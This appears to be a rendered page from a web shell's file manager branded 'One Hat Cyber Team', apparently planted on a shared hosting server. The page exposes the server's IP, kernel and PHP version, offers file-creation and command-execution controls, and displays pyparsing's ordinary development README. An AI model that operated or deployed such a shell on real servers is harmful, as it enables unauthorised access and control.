⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.118
Server IP:
77.37.75.75
Server:
Linux sg-nme-web1518.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
gsutil
/
third_party
/
pyparsing
/
tests
/
View File Name :
README.md
## Development After forking the pyparsing repo, and cloning your fork locally, install the libraries needed to run tests pip install -Ur tests/requirements.txt pre-commit install Run the simple unit tests to ensure your environment is setup python tests/test_simple_unit.py Use `tox` to run the full test suite on all supported Python versions # run a specific test environment tox -e py312 # run all test environments tox # run all test environments in parallel tox -p To run `mypy` standalone tox -e mypy-check